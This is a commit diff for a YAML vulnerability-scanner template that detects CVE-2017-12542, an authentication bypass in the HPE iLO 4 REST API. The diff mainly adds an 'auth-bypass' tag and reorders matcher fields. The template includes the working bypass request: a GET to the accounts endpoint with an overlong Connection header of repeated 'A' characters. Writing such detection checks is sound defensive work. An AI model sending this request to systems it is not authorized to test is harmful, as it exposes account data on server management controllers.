Update CVE-2017-12542.yaml
parent
24f9a7b536
commit
9ba2ae1201
|
@ -12,26 +12,27 @@ info:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
cvss-score: 10.0
|
cvss-score: 10.0
|
||||||
cve-id: CVE-2017-12542
|
cve-id: CVE-2017-12542
|
||||||
tags: cve,cve2017,ilo4,hpe
|
tags: cve,cve2017,ilo4,hpe,auth-bypass
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
|
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "iLO User"
|
- "iLO User"
|
||||||
part: body
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- "application/json"
|
- "application/json"
|
||||||
part: header
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
Loading…
Reference in New Issue